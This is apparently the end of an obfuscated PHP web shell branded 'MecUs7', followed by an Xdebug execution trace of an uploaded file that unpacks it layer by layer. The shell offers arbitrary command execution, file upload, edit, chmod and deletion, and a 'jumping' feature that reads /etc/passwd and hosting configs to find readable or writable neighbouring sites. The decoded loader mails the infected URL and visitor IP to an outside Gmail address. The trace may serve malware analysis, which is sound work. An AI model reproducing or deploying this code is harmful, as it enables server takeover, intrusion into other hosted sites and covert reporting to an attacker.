'<hr>';\r\neval(gzinflate(base64_decode('7Vf/T9tGFP89Uv6H1yOT7ZHaSRBrReKUrjCt0lakAtskqCLHPmOPi8+6u2BSyv++d+fYpE4AlVbaJhWJyHnf/b583ksnnjMGPkglJoLmLAip3ZkcH77/4/D9mXVw9Ob098N3J5P3R0cn1ocuENKFTh6oxBm2W52oNwvSTKL6fpwyahOPqtDLghmN3JBnMdFSW1uJUmhWtltpbFc6zk27tT+7jFJhk4iGwWIiFzPS7b148UIr7YdJg2Wo9JqGNmEZPJfggeBcGXpHe9/BMKyjXKUcI3qbRSgr4RfOGC+OF7Pf0uwSIzhIBQ0VFwsjAMa8m6hZu/U6ik4WOQVFr5WHeUgzcPMkB8P5NcgiRkWT2W4dByqV8QJeZwvLBJLrMGKe08y20HAQ4otLq2sVVhloYfiFSBXmGaW7ZezOcD8OGZclUYvSMOFA2q2RCqaMQsDSi8wPaaYwjCkXERX+DlZtwahvFWmkkr2fej8MS87zkDMu9rZe/tzDv6E11maE+Yw+szQexTxTYMR9ls4oyPQj9QfjYxfecXfkafZ45KnoS5QPuCnxE7VPJRVP1cVCMyx0Q9vDdyemX0M+Rz0f+vgt5oIGYVJ3JAQSls+6ObFXqaAXqU0+8oySbsVybnIkT2aBCpNJwJhtbWkBILb7o0O2rG5lRD+UidDljNlcJrZ+QsM4bAwbRIl0ZldCZ/0PZ70PjgNjGGj/nTnmAUPNuUyvJxdU5cU8jWwzaLzIqFhO2xUmJpBUesRtmqq7CIvfyB8mpszhMnEEXKjS46LCPelnNEZqAImgsY9jne95XlEUbtO3S7yqRiyQ0lfXarwuU3sJVjxpOf3qZ5bGEcuI1bzKtdXRsOXV6OBpKPASPqPemrqXz6csDSc45cwCFQjMpW9NpizILq21KJsdtAxt2UOwWshlvra3h7e3t3WqPTOvpt9uKZNUl/Lk8PjELyHSMkXL0V0RWWU7gG0EnoSI/3VAhMcQER6AROQ2UREqWIQHcLE/LtEO7sEN0/M7GzHuEZUN2PSYk3VEqvEIPgckMO9dJ4usdApuXSKIA1wAvU6VTU4z8/aKg5YFrfjMVB6KRLfZs5hyXLaa7ujGgo7e0jG2vlxSjUODYlSzAiGChV1SdUB3IIcte+4huL1yzvfOPU9qhJPdWrdpaPWQIOVEdvFqqCRw9o3GHQrWhhD5+gP49AnWGL4PPc24c+MDmaYZWSPqlP3V73uxXOddBcJj6dTL7mMGIi80aTP3gucJFes8uTEQYy+arTPmEk0hNN0TQ6zyzW+VbWJoDcTfzQxzhxEHk423mEqzOb0bID0gDzXuho3wYLevwLzWq0KpFMmq50cMVBj/AMQ3XKwi/BrA1wMY3DN9Gr9rlKkmownmJZTr+5VLeIYJ/jPNIl5I4tzci9mbEFtfsGt4fYfW6PkLAbvXe/kNoLrd+mqwfgCpq0Ing2WZrcsBYzs70aAuDxxTcUXFyEsG428C7m8P/lVgV3SWY6IIGXbwQOvjY888DTTW65schfAAtZfskQ+GW37d3nbgpoPXnv5h1bj/jMASQfFwQJJTOnN9+JunWLY9q2vILjnPsHGrSlijqfDG1rAKrTw+9ZdlA+4i0URllo+iUrk4jgjeRblY4nxeLY/d7lJRk1dGZxdNray0ap9tsvpV+2x9mX2bTfZ9jX1fY//nNdYYxw2bbORF6RV+LoMmw3mmza5MplG6Bb3v4E59EwK+CbKM4yvjz2hFoYmHtQdtrvx/Nf4H')));\r\n} elseif(\$_GET['to'] == 'jumping') {\r\n\t\$i = 0;\r\n\techo \"<div class='margin: 5px auto;'>\";\r\n\tif(preg_match(\"/hsphere/\", \$dir)) {\r\n\t\t\$urls = explode(\"\\r\\n\", \$_POST['url']);\r\n\t\tif(isset(\$_POST['jump'])) {\r\n\t\t\techo \"<pre>\";\r\n\t\t\tforeach(\$urls as \$url) {\r\n\t\t\t\t\$url = str_replace(array(\"http://\",\"www.\"), \"\", strtolower(\$url));\r\n\t\t\t\t\$etc = \"/etc/passwd\";\r\n\t\t\t\t\$f = fopen(\$etc,\"r\");\r\n\t\t\t\twhile(\$gets = fgets(\$f)) {\r\n\t\t\t\t\t\$pecah = explode(\":\", \$gets);\r\n\t\t\t\t\t\$user = \$pecah[0];\r\n\t\t\t\t\t\$dir_user = \"/hsphere/local/home/\$user\";\r\n\t\t\t\t\tif(is_dir(\$dir_user) === true) {\r\n\t\t\t\t\t\t\$url_user = \$dir_user.\"/\".\$url;\r\n\t\t\t\t\t\tif(is_readable(\$url_user)) {\r\n\t\t\t\t\t\t\t\$i++;\r\n\t\t\t\t\t\t\t\$jrw = \"[<font color=lime>R</font>] <a href='?dir=\$url_user'><font color=gold>\$url_user</font></a>\";\r\n\t\t\t\t\t\t\tif(is_writable(\$url_user)) {\r\n\t\t\t\t\t\t\t\t\$jrw = \"[<font color=lime>RW</font>] <a href='?dir=\$url_user'><font color=gold>\$url_user</font></a>\";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo \$jrw.\"<br>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tif(\$i == 0) { \r\n\t\t} else {\r\n\t\t\techo \"<br>Total ada \".\$i.\" Kamar di \".\$ip;\r\n\t\t}\r\n\t\techo \"</pre>\";\r\n\t\t} else {\r\n\t\t\techo '<center>\r\n\t\t\t\t <form method=\"post\">\r\n\t\t\t\t List Domains: <br>\r\n\t\t\t\t <textarea name=\"url\" style=\"width: 500px; height: 250px;\">';\r\n\t\t\t\$fp = fopen(\"/hsphere/local/config/httpd/sites/sites.txt\",\"r\");\r\n\t\t\twhile(\$getss = fgets(\$fp)) {\r\n\t\t\t\techo \$getss;\r\n\t\t\t}\r\n\t\t\techo '</textarea><br>\r\n\t\t\t\t <input type=\"submit\" value=\"Jumping\" name=\"jump\" style=\"width: 500px; height: 25px;\">\r\n\t\t\t\t </form></center>';\r\n\t\t}\r\n\t} elseif(preg_match(\"/vhosts|vhost/\", \$dir)) {\r\n\t\tpreg_match(\"/\\/var\\/www\\/(.*?)\\//\", \$dir, \$vh);\r\n\t\t\$urls = explode(\"\\r\\n\", \$_POST['url']);\r\n\t\tif(isset(\$_POST['jump'])) {\r\n\t\t\techo \"<pre>\";\r\n\t\t\tforeach(\$urls as \$url) {\r\n\t\t\t\t\$url = str_replace(\"www.\", \"\", \$url);\r\n\t\t\t\t\$web_vh = \"/var/www/\".\$vh[1].\"/\$url/httpdocs\";\r\n\t\t\t\tif(is_dir(\$web_vh) === true) {\r\n\t\t\t\t\tif(is_readable(\$web_vh)) {\r\n\t\t\t\t\t\t\$i++;\r\n\t\t\t\t\t\t\$jrw = \"[<font color=lime>R</font>] <a href='?dir=\$web_vh'><font color=gold>\$web_vh</font></a>\";\r\n\t\t\t\t\t\tif(is_writable(\$web_vh)) {\r\n\t\t\t\t\t\t\t\$jrw = \"[<font color=lime>RW</font>] <a href='?dir=\$web_vh'><font color=gold>\$web_vh</font></a>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\techo \$jrw.\"<br>\";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tif(\$i == 0) { \r\n\t\t} else {\r\n\t\t\techo \"<br>Total ada \".\$i.\" Kamar di \".\$ip;\r\n\t\t}\r\n\t\techo \"</pre>\";\r\n\t\t} else {\r\n\t\t\techo '<center>\r\n\t\t\t\t <form method=\"post\">\r\n\t\t\t\t List Domains: <br>\r\n\t\t\t\t <textarea name=\"url\" style=\"width: 500px; height: 250px;\">';\r\n\t\t\t\t bing(\"ip:\$ip\");\r\n\t\t\techo '</textarea><br>\r\n\t\t\t\t <input type=\"submit\" value=\"Jumping\" name=\"jump\" style=\"width: 500px; height: 25px;\">\r\n\t\t\t\t </form></center>';\r\n\t\t}\r\n\t} else {\r\n\t\techo \"<pre>\";\r\n\t\t\$etc = fopen(\"/etc/passwd\", \"r\") or die(\"<font color=red>Can't read /etc/passwd</font>\");\r\n\t\twhile(\$passwd = fgets(\$etc)) {\r\n\t\t\tif(\$passwd == '' || !\$etc) {\r\n\t\t\t\techo \"<font color=red>Can't read /etc/passwd</font>\";\r\n\t\t\t} else {\r\n\t\t\t\tpreg_match_all('/(.*?):x:/', \$passwd, \$user_jumping);\r\n\t\t\t\tforeach(\$user_jumping[1] as \$user_idx_jump) {\r\n\t\t\t\t\t\$user_jumping_dir = \"/home/\$user_idx_jump/public_html\";\r\n\t\t\t\t\tif(is_readable(\$user_jumping_dir)) {\r\n\t\t\t\t\t\t\$i++;\r\n\t\t\t\t\t\t\$jrw = \"[<font color=lime>R</font>] <a href='?dir=\$user_jumping_dir'><font color=gold>\$user_jumping_dir</font></a>\";\r\n\t\t\t\t\t\tif(is_writable(\$user_jumping_dir)) {\r\n\t\t\t\t\t\t\t\$jrw = \"[<font color=lime>RW</font>] <a href='?dir=\$user_jumping_dir'><font color=gold>\$user_jumping_dir</font></a>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\techo \$jrw;\r\n\t\t\t\t\t\tif(function_exists('posix_getpwuid')) {\r\n\t\t\t\t\t\t\t\$domain_jump = file_get_contents(\"/etc/named.conf\");\t\r\n\t\t\t\t\t\t\tif(\$domain_jump == '') {\r\n\t\t\t\t\t\t\t\techo \" => ( <font color=red>gabisa ambil nama domain nya</font> )<br>\";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\tpreg_match_all(\"#/var/named/(.*?).db#\", \$domain_jump, \$domains_jump);\r\n\t\t\t\t\t\t\t\tforeach(\$domains_jump[1] as \$dj) {\r\n\t\t\t\t\t\t\t\t\t\$user_jumping_url = posix_getpwuid(@fileowner(\"/etc/valiases/\$dj\"));\r\n\t\t\t\t\t\t\t\t\t\$user_jumping_url = \$user_jumping_url['name'];\r\n\t\t\t\t\t\t\t\t\tif(\$user_jumping_url == \$user_idx_jump) {\r\n\t\t\t\t\t\t\t\t\t\techo \" => ( <u>\$dj</u> )<br>\";\r\n\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\techo \"<br>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif(\$i == 0) { \r\n\t\t} else {\r\n\t\t\techo \"<br>Total ada \".\$i.\" Kamar di \".\$ip;\r\n\t\t}\r\n\t\techo \"</pre>\";\r\n\t}\r\n\techo \"</div>\";\r\n} elseif(\$_GET['to'] == 'cmd') {\r\n\techo \"<form method='post'>\r\n\t<font style='text-decoration: underline;'>\".\$user.\"@\".\$ip.\": ~ \$ </font>\r\n\t<input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>\r\n\t</form>\";\r\n\tif(\$_POST['do_cmd']) {\r\n\t\techo \"<pre>\".exe(\$_POST['cmd']).\"</pre>\";\r\n\t}\r\n}\r\necho '<form enctype=\"multipart/form-data\" method=\"POST\">\r\n<font color=\"white\">File Upload :</font> <input type=\"file\" name=\"file\" />\r\n<input type=\"submit\" value=\"Crotz\" />\r\n</form>\r\n</td></tr>';\r\nif(isset(\$_GET['filesrc'])){\r\necho \"<tr><td>Current File : \";\r\necho \$_GET['filesrc'];\r\necho '</tr></td></table><br />';\r\necho('<pre>'.htmlspecialchars(file_get_contents(\$_GET['filesrc'])).'</pre>');\r\n}elseif(isset(\$_GET['option']) && \$_POST['opt'] != 'delete'){\r\necho '</table><br /><center>'.\$_POST['path'].'<br /><br />';\r\nif(\$_POST['opt'] == 'chmod'){\r\nif(isset(\$_POST['perm'])){\r\nif(chmod(\$_POST['path'],\$_POST['perm'])){\r\necho '<font color=\"green\">Change Permission Berhasil</font><br/>';\r\n}else{\r\necho '<font color=\"red\">Change Permission Gagal</font><br />';\r\n}\r\n}\r\necho '<form method=\"POST\">\r\nPermission : <input name=\"perm\" type=\"text\" size=\"4\" value=\"'.substr(sprintf('%o', fileperms(\$_POST['path'])), -4).'\" />\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\r\n<input type=\"hidden\" name=\"opt\" value=\"chmod\">\r\n<input type=\"submit\" value=\"Go\" />\r\n</form>';\r\n}elseif(\$_POST['opt'] == 'rename'){\r\nif(isset(\$_POST['newname'])){\r\nif(rename(\$_POST['path'],\$path.'/'.\$_POST['newname'])){\r\necho '<font color=\"green\">Ganti Nama Berhasil</font><br/>';\r\n}else{\r\necho '<font color=\"red\">Ganti Nama Gagal</font><br />';\r\n}\r\n\$_POST['name'] = \$_POST['newname'];\r\n}\r\necho '<form method=\"POST\">\r\nNama Baru : <input name=\"newname\" type=\"text\" size=\"20\" value=\"'.\$_POST['name'].'\" />\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\r\n<input type=\"hidden\" name=\"opt\" value=\"rename\">\r\n<input type=\"submit\" value=\"Crotz\" />\r\n</form>';\r\n}elseif(\$_POST['opt'] == 'edit'){\r\nif(isset(\$_POST['src'])){\r\n\$fp = fopen(\$_POST['path'],'w');\r\nif(fwrite(\$fp,\$_POST['src'])){\r\necho '<font color=\"green\">Berhasil Edit File</font><br/>';\r\n}else{\r\necho '<font color=\"red\">Gagal Edit File</font><br/>';\r\n}\r\nfclose(\$fp);\r\n}\r\necho '<form method=\"POST\">\r\n<textarea cols=80 rows=20 name=\"src\">'.htmlspecialchars(file_get_contents(\$_POST['path'])).'</textarea><br />\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\r\n<input type=\"hidden\" name=\"opt\" value=\"edit\">\r\n<input type=\"submit\" value=\"Save\" />\r\n</form>';\r\n}\r\necho '</center>';\r\n}else{\r\necho '</table><br/><center>';\r\nif(isset(\$_GET['option']) && \$_POST['opt'] == 'delete'){\r\nif(\$_POST['type'] == 'dir'){\r\nif(rmdir(\$_POST['path'])){\r\necho '<font color=\"green\">Directory Terhapus</font><br/>';\r\n}else{\r\necho '<font color=\"red\">Directory Gagal Terhapus </font><br/>';\r\n}\r\n}elseif(\$_POST['type'] == 'file'){\r\nif(unlink(\$_POST['path'])){\r\necho '<font color=\"green\">File Terhapus</font><br/>';\r\n}else{\r\necho '<font color=\"red\">File Gagal Dihapus</font><br/>';\r\n}\r\n}\r\n}\r\necho '</center>';\r\n\$scandir = scandir(\$path);\r\necho '<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<td><center>Name</peller></center></td>\r\n<td><center>Size</peller></center></td>\r\n<td><center>Permission</peller></center></td>\r\n<td><center>Modify</peller></center></td>\r\n</tr>';\r\n\r\nforeach(\$scandir as \$dir){\r\nif(!is_dir(\$path.'/'.\$dir) || \$dir == '.' || \$dir == '..') continue;\r\necho '<tr>\r\n<td><a href=\"?path='.\$path.'/'.\$dir.'\">'.\$dir.'</a></td>\r\n<td><center>--</center></td>\r\n<td><center>';\r\nif(is_writable(\$path.'/'.\$dir)) echo '<font color=\"green\">';\r\nelseif(!is_readable(\$path.'/'.\$dir)) echo '<font color=\"red\">';\r\necho perms(\$path.'/'.\$dir);\r\nif(is_writable(\$path.'/'.\$dir) || !is_readable(\$path.'/'.\$dir)) echo '</font>';\r\n\r\necho '</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path='.\$path.'\">\r\n<select name=\"opt\">\r\n<option value=\"\">Select</option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n<input type=\"hidden\" name=\"name\" value=\"'.\$dir.'\">\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$path.'/'.\$dir.'\">\r\n<input type=\"submit\" value=\">\">\r\n</form></center></td>\r\n</tr>';\r\n}\r\necho '<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>';\r\nforeach(\$scandir as \$file){\r\nif(!is_file(\$path.'/'.\$file)) continue;\r\n\$size = filesize(\$path.'/'.\$file)/1024;\r\n\$size = round(\$size,3);\r\nif(\$size >= 1024){\r\n\$size = round(\$size/1024,2).' MB';\r\n}else{\r\n\$size = \$size.' KB';\r\n}\r\n\r\necho '<tr>\r\n<td><a href=\"?filesrc='.\$path.'/'.\$file.'&path='.\$path.'\">'.\$file.'</a></td>\r\n<td><center>'.\$size.'</center></td>\r\n<td><center>';\r\nif(is_writable(\$path.'/'.\$file)) echo '<font color=\"green\">';\r\nelseif(!is_readable(\$path.'/'.\$file)) echo '<font color=\"red\">';\r\necho perms(\$path.'/'.\$file);\r\nif(is_writable(\$path.'/'.\$file) || !is_readable(\$path.'/'.\$file)) echo '</font>';\r\necho '</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path='.\$path.'\">\r\n<select name=\"opt\">\r\n<option value=\"\">Pilih</option>\r\n<option value=\"delete\">Hapus</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Ganti Nama</option>\r\n<option value=\"edit\">Ubah</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n<input type=\"hidden\" name=\"name\" value=\"'.\$file.'\">\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$path.'/'.\$file.'\">\r\n<input type=\"submit\" value=\">\">\r\n</form></center></td>\r\n</tr>';\r\n}\r\necho '</table>\r\n</div>';\r\n}\r\necho '<center><br/>Copyright © 2019 | Powered By MecUs7</center>\r\n</body>\r\n</html>';\r\nfunction perms(\$file){\r\n\$perms = fileperms(\$file);\r\n\r\nif ((\$perms & 0xC000) == 0xC000) {\r\n// Socket\r\n\$info = 's';\r\n} elseif ((\$perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n\$info = 'l';\r\n} elseif ((\$perms & 0x8000) == 0x8000) {\r\n// Regular\r\n\$info = '-';\r\n} elseif ((\$perms & 0x6000) == 0x6000) {\r\n// Block special\r\n\$info = 'b';\r\n} elseif ((\$perms & 0x4000) == 0x4000) {\r\n// Directory\r\n\$info = 'd';\r\n} elseif ((\$perms & 0x2000) == 0x2000) {\r\n// Character special\r\n\$info = 'c';\r\n} elseif ((\$perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n\$info = 'p';\r\n} else {\r\n// Unknown\r\n\$info = 'u';\r\n}\r\n\r\n// Owner\r\n\$info .= ((\$perms & 0x0100) ? 'r' : '-');\r\n\$info .= ((\$perms & 0x0080) ? 'w' : '-');\r\n\$info .= ((\$perms & 0x0040) ?\r\n((\$perms & 0x0800) ? 's' : 'x' ) :\r\n((\$perms & 0x0800) ? 'S' : '-'));\r\n\r\n// Group\r\n\$info .= ((\$perms & 0x0020) ? 'r' : '-');\r\n\$info .= ((\$perms & 0x0010) ? 'w' : '-');\r\n\$info .= ((\$perms & 0x0008) ?\r\n((\$perms & 0x0400) ? 's' : 'x' ) :\r\n((\$perms & 0x0400) ? 'S' : '-'));\r\n\r\n// World\r\n\$info .= ((\$perms & 0x0004) ? 'r' : '-');\r\n\$info .= ((\$perms & 0x0002) ? 'w' : '-');\r\n\$info .= ((\$perms & 0x0001) ?\r\n((\$perms & 0x0200) ? 't' : 'x' ) :\r\n((\$perms & 0x0200) ? 'T' : '-'));\r\n\r\nreturn \$info;\r\n}\r\n?> ");
exit;Execution traces
data/traces/aa2aa46aeb16616812137f5336e8ec7f_trace-1676246816.2722.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:07:22.170036]
1 0 1 0.000151 393464
1 3 0 0.000273 406504 {main} 1 /var/www/html/uploads/x.php 0 0
1 A /var/www/html/uploads/x.php 6 $ObFus_Sad = 'ZXZhbCgnPz4nLmd6dW5jb21wcmVzcyhnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJFNhZF9UbzBMcykpKSkpOw'
1 A /var/www/html/uploads/x.php 7 $Sad_To0Ls = 'PA1ibNw/BQ5+bFV3ggwXcjj9WzJP4o88juMmOCTPRc82YjPOzjHm0/qSlaou4gu4HhxbSgDwqzHH95Lij3O7j5NOl/h4oMuR7DVn6l2wfwFFgLLWQs5L3myptfZ99bEBUbQ81RxUlbEHP+CyCErrLYBsJY/9Uw3x2RfkAOvWerB4BJ5fzgzAQHrunYd1LqohmrSAEWMTGEqUFqWAiS9NFl6xJyzAtGAChCmsyRlAEjabJOljRC1C4+bJAkoSbIBljPoSBEu1gLCNV5GND4CN34CNjPfjAwaFMFNwqBlCUGatp4UPJBEPkDKqioSoBSLrJZAyQ2dkm8t0dhMDbGTx+bwhQH7ngj+EImGoxBsol4+A7WyPein5fB4DUyVhIUh5+Hp9Qk1g3lbCeLI8XxVyXyb+aATh53gL87t4f/NI9Z7p+ojg/JQvfghg+Qz14/wg58yCrg5ZwQ/4aRfD+SAvwEst3GThvyv07QBd/HCqEbxPMu2IMo1/QCk9Fu0SO6jy'
2 4 0 0.000338 406504 base64_decode 0 /var/www/html/uploads/x.php 8 1 'ZXZhbCgnPz4nLmd6dW5jb21wcmVzcyhnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJFNhZF9UbzBMcykpKSkpOw'
2 4 1 0.000357 406664
2 4 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($Sad_To0Ls)))));'
2 5 0 0.000376 406632 urldecode 0 /var/www/html/uploads/x.php 8 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($Sad_To0Ls)))));'
2 5 1 0.000393 406760
2 5 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($Sad_To0Ls)))));'
2 6 0 0.000411 406600 htmlspecialchars_decode 0 /var/www/html/uploads/x.php 8 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($Sad_To0Ls)))));'
2 6 1 0.000427 406632
2 6 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($Sad_To0Ls)))));'
2 7 0 0.000454 408168 eval 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($Sad_To0Ls)))));' /var/www/html/uploads/x.php 8 0
3 8 0 0.000470 408168 strrev 0 /var/www/html/uploads/x.php(8) : eval()'d code 1 1 'PA1ibNw/BQ5+bFV3ggwXcjj9WzJP4o88juMmOCTPRc82YjPOzjHm0/qSlaou4gu4HhxbSgDwqzHH95Lij3O7j5NOl/h4oMuR7DVn6l2wfwFFgLLWQs5L3myptfZ99bEBUbQ81RxUlbEHP+CyCErrLYBsJY/9Uw3x2RfkAOvWerB4BJ5fzgzAQHrunYd1LqohmrSAEWMTGEqUFqWAiS9NFl6xJyzAtGAChCmsyRlAEjabJOljRC1C4+bJAkoSbIBljPoSBEu1gLCNV5GND4CN34CNjPfjAwaFMFNwqBlCUGatp4UPJBEPkDKqioSoBSLrJZAyQ2dkm8t0dhMDbGTx+bwhQH7ngj+EImGoxBsol4+A7WyPein5fB4DUyVhIUh5+Hp9Qk1g3lbCeLI8XxVyXyb+aATh53gL87t4f/NI9Z7p+ojg/JQvfghg+Qz14/wg58yCrg5ZwQ/4aRfD+SAvwEst3GThvyv07QBd/HCqEbxPMu2IMo1/QCk9Fu0SO6jy'
3 8 1 0.000502 420488
3 8 R 'Aa0aUuV4nO08+XPaSLM/Z6v2f5ho/SL8YSNx2GDHkMUYMBgM5jROUpSQBiTQhSTO3by//c0hCXE5Tnbfvu9Vfa4EJHVPT09f0z0z4uaTKZu//vK7oit9Gzoh1pg55szpD2bDIbQUfcSeAf70YxBDUmxTFVZ9aFmGZXtwBOo7igb7qqIpTog885toUDOsFQWhBuxlospiBBkKErRCbM7QHag7562VCa+BA5cOJzua+hGIsmAhCul2q3CeIk1OnNl4JuiaoKggDRBlcWZHAp+/jzAoIhoai7GXfVNwZITJyI5jXnMcAyLgpN/MNzr5xmeWfvcfs9U8+3UL0sg/tfPNVr/dKLFfMSUT2oLeF1RoOZjcUFkCj/q1Cf5VqoOsJFnQtsE1+AyYHWLVWivfz97dNUg3DPjKIJqY01BgQGeAqdSKxXyDOQPB/tDzt1DE4vmU+fWXG6pTop++BU3DcpAiQ0fVhBQ1DI0QQBNGitifzgwH2v2RKYZOT//49ZehYUFB'
3 9 0 0.000535 420456 base64_decode 0 /var/www/html/uploads/x.php(8) : eval()'d code 1 1 'Aa0aUuV4nO08+XPaSLM/Z6v2f5ho/SL8YSNx2GDHkMUYMBgM5jROUpSQBiTQhSTO3by//c0hCXE5Tnbfvu9Vfa4EJHVPT09f0z0z4uaTKZu//vK7oit9Gzoh1pg55szpD2bDIbQUfcSeAf70YxBDUmxTFVZ9aFmGZXtwBOo7igb7qqIpTog885toUDOsFQWhBuxlospiBBkKErRCbM7QHag7562VCa+BA5cOJzua+hGIsmAhCul2q3CeIk1OnNl4JuiaoKggDRBlcWZHAp+/jzAoIhoai7GXfVNwZITJyI5jXnMcAyLgpN/MNzr5xmeWfvcfs9U8+3UL0sg/tfPNVr/dKLFfMSUT2oLeF1RoOZjcUFkCj/q1Cf5VqoOsJFnQtsE1+AyYHWLVWivfz97dNUg3DPjKIJqY01BgQGeAqdSKxXyDOQPB/tDzt1DE4vmU+fWXG6pTop++BU3DcpAiQ0fVhBQ1DI0QQBNGitifzgwH2v2RKYZOT//49ZehYUFB'
3 9 1 0.000586 432776
3 9 R '\001�\032R�x��<�s�H�?g���h�"�a#q�`ǐ�\0300\030\f�4NR��\006$Ѕ$�ݼ���!\tq9Nv߾�U}�\004$uOOO_�=3��)����+}\033:!֘9���\017f�!�\024}Ğ\001��c\020CRlS\025V}hY�e{p\004�;�\006���)N�<�hP3�\025\005�\006�e��b\004\031\n\022�Bl��\035�;筕\t��\003�\016\';��\021��`!\n�v�p�"MN��x&蚠� \r\020eqfG\002���0("\032\032���}Spd��Ȏc^s\034\003"���7:��g�~�\037��<�u\v��?���V��(�_1%\023ڂ�\027Th9��PY\002���\t�U���$Yж�5�\f�\035b�Z+����5H7\f�� ���P`@g��Ԋ�|�9\003����P�����\033�S���\005M�r�"CGՄ\0245\f�\020@\023F�؟�\f\a��)�N'
3 10 0 0.000765 420456 gzinflate 0 /var/www/html/uploads/x.php(8) : eval()'d code 1 1 '\001�\032R�x��<�s�H�?g���h�"�a#q�`ǐ�\0300\030\f�4NR��\006$Ѕ$�ݼ���!\tq9Nv߾�U}�\004$uOOO_�=3��)����+}\033:!֘9���\017f�!�\024}Ğ\001��c\020CRlS\025V}hY�e{p\004�;�\006���)N�<�hP3�\025\005�\006�e��b\004\031\n\022�Bl��\035�;筕\t��\003�\016\';��\021��`!\n�v�p�"MN��x&蚠� \r\020eqfG\002���0("\032\032���}Spd��Ȏc^s\034\003"���7:��g�~�\037��<�u\v��?���V��(�_1%\023ڂ�\027Th9��PY\002���\t�U���$Yж�5�\f�\035b�Z+����5H7\f�� ���P`@g��Ԋ�|�9\003����P�����\033�S���\005M�r�"CGՄ\0245\f�\020@\023F�؟�\f\a��)�N'
3 10 1 0.000948 428680
3 10 R 'x��<�s�H�?g���h�"�a#q�`ǐ�\0300\030\f�4NR��\006$Ѕ$�ݼ���!\tq9Nv߾�U}�\004$uOOO_�=3��)����+}\033:!֘9���\017f�!�\024}Ğ\001��c\020CRlS\025V}hY�e{p\004�;�\006���)N�<�hP3�\025\005�\006�e��b\004\031\n\022�Bl��\035�;筕\t��\003�\016\';��\021��`!\n�v�p�"MN��x&蚠� \r\020eqfG\002���0("\032\032���}Spd��Ȏc^s\034\003"���7:��g�~�\037��<�u\v��?���V��(�_1%\023ڂ�\027Th9��PY\002���\t�U���$Yж�5�\f�\035b�Z+����5H7\f�� ���P`@g��Ԋ�|�9\003����P�����\033�S���\005M�r�"CGՄ\0245\f�\020@\023F�؟�\f\a��)�NO�����aAA�C'
3 11 0 0.001125 416360 gzuncompress 0 /var/www/html/uploads/x.php(8) : eval()'d code 1 1 'x��<�s�H�?g���h�"�a#q�`ǐ�\0300\030\f�4NR��\006$Ѕ$�ݼ���!\tq9Nv߾�U}�\004$uOOO_�=3��)����+}\033:!֘9���\017f�!�\024}Ğ\001��c\020CRlS\025V}hY�e{p\004�;�\006���)N�<�hP3�\025\005�\006�e��b\004\031\n\022�Bl��\035�;筕\t��\003�\016\';��\021��`!\n�v�p�"MN��x&蚠� \r\020eqfG\002���0("\032\032���}Spd��Ȏc^s\034\003"���7:��g�~�\037��<�u\v��?���V��(�_1%\023ڂ�\027Th9��PY\002���\t�U���$Yж�5�\f�\035b�Z+����5H7\f�� ���P`@g��Ԋ�|�9\003����P�����\033�S���\005M�r�"CGՄ\0245\f�\020@\023F�؟�\f\a��)�NO�����aAA�C'
3 11 1 0.001373 440968
3 11 R '<?php\r\n@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\nset_time_limit(0);\r\nini_set(\'memory_limit\', \'64M\');\r\nheader(\'Content-Type: text/html; charset=UTF-8\');\r\n$tujuanmail = \'mecus.mecus.mecus@gmail.com\';\r\n$x_path = "http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'];\r\n$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER[\'REMOTE_ADDR\'] . " ]";\r\nmail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER[\'REMOTE_ADDR\'] . " ]");\r\n?>\r\n<?'
